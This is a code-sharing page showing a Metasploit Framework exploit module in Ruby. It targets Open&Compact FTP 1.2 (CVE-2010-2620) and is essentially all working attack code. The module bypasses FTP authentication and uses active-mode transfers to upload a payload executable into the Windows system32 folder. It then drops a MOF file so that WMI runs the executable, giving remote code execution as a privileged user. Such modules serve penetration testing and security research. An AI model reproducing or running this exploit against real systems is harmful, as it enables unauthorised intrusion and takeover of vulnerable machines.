Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/open_ftpd_wbem.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::Ftp
10
include Msf::Exploit::Remote::TcpServer
11
include Msf::Exploit::EXE
12
include Msf::Exploit::WbemExec
13
include Msf::Exploit::FileDropper
14
15
def initialize(info = {})
16
super(
17
update_info(
18
info,
19
'Name' => "Open-FTPD 1.2 Arbitrary File Upload",
20
'Description' => %q{
21
This module exploits multiple vulnerabilities found in Open&Compact FTP
22
server. The software contains an authentication bypass vulnerability and a
23
arbitrary file upload vulnerability that allows a remote attacker to write
24
arbitrary files to the file system as long as there is at least one user
25
who has permission.
26
27
Code execution can be achieved by first uploading the payload to the remote
28
machine as an exe file, and then upload another mof file, which enables
29
WMI (Management Instrumentation service) to execute the uploaded payload.
30
Please note that this module currently only works for Windows before Vista.
31
},
32
'License' => MSF_LICENSE,
33
'Author' => [
34
'Serge Gorbunov', # Initial discovery
35
'bcoles', # Metasploit
36
],
37
'References' => [
38
['OSVDB', '65687'],
39
['EDB', '13932'],
40
['CVE', '2010-2620']
41
],
42
'Payload' => {
43
'BadChars' => "\x00",
44
},
45
'Platform' => 'win',
46
'Stance' => Msf::Exploit::Stance::Aggressive,
47
'Targets' => [
48
# Tested on version 1.2 - Windows XP SP3 (EN)
49
['Open&Compact FTP 1.2 on Windows (Before Vista)', {}]
50
],
51
'Privileged' => true,
52
'DisclosureDate' => '2012-06-18',
53
'DefaultTarget' => 0,
54
'Notes' => {
55
'Reliability' => UNKNOWN_RELIABILITY,
56
'Stability' => UNKNOWN_STABILITY,
57
'SideEffects' => UNKNOWN_SIDE_EFFECTS
58
}
59
)
60
)
61
62
register_options([
63
OptString.new('PATH', [true, 'The local Windows path', "C:/WINDOWS/"]),
64
OptPort.new('SRVPORT', [true, 'The local port to listen on for active mode', 8080])
65
])
66
deregister_options('FTPUSER', 'FTPPASS') # Using authentication bypass
67
end
68
69
def check
70
connect
71
disconnect
72
73
if banner =~ /\*\* Welcome on \*\*/
74
return Exploit::CheckCode::Detected
75
else
76
return Exploit::CheckCode::Unknown
77
end
78
end
79
80
def on_client_connect(cli)
81
peer = "#{cli.peerhost}:#{cli.peerport}"
82
83
case @stage
84
when :exe
85
print_status("Sending executable (#{@exe.length.to_s} bytes)")
86
cli.put(@exe)
87
@stage = :mof
88
when :mof
89
print_status("Sending MOF (#{@mof.length.to_s} bytes)")
90
cli.put(@mof)
91
end
92
93
cli.close
94
end
95
96
# Largely stolen from freefloatftp_wbem.rb
97
def upload(filename)
98
select(nil, nil, nil, 1)
99
100
peer = "#{rhost}:#{rport}"
101
print_status("Trying to upload #{::File.basename(filename)}")
102
conn = connect(false, datastore['VERBOSE'])
103
if not conn
104
fail_with(Failure::Unreachable, "#{@peer} - Connection failed")
105
end
106
107
# Switch to binary mode
108
print_status("Set binary mode")
109
send_cmd(['TYPE', 'I'], true, conn)
110
111
# Prepare active mode: Get attacker's IP and source port
112
src_ip = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
113
src_port = datastore['SRVPORT'].to_i
114
115
# Prepare active mode: Convert the IP and port for active mode
116
src_ip = src_ip.gsub(/\./, ',')
117
src_port = "#{src_port / 256},#{src_port.remainder(256)}"
118
119
# Set to active mode
120
print_status("Set active mode \"#{src_ip},#{src_port}\"")
121
send_cmd(['PORT', "#{src_ip},#{src_port}"], true, conn)
122
123
# Tell the FTP server to download our file
124
send_cmd(['STOR', filename], false, conn)
125
126
print_good("Upload successful")
127
disconnect(conn)
128
end
129
130
# Largely stolen from freefloatftp_wbem.rb
131
def exploit
132
path = datastore['PATH']
133
exe_name = "#{path}/system32/#{rand_text_alpha(rand(10) + 5)}.exe"
134
mof_name = "#{path}/system32/wbem/mof/#{rand_text_alpha(rand(10) + 5)}.mof"
135
@mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
136
@exe = generate_payload_exe
137
@stage = :exe
138
139
begin
140
t = framework.threads.spawn("reqs", false) {
141
begin
142
# Upload our malicious executable
143
u = upload(exe_name)
144
# Upload the mof file
145
upload(mof_name) if u
146
register_file_for_cleanup("#{::File.basename(exe_name)}")
147
register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
148
rescue ::Exception => e
149
print_error "Upload Failed: #{e.message}"
150
cleanup
151
end
152
}
153
154
super
155
ensure
156
t.kill
157
end
158
end
159
end
160
161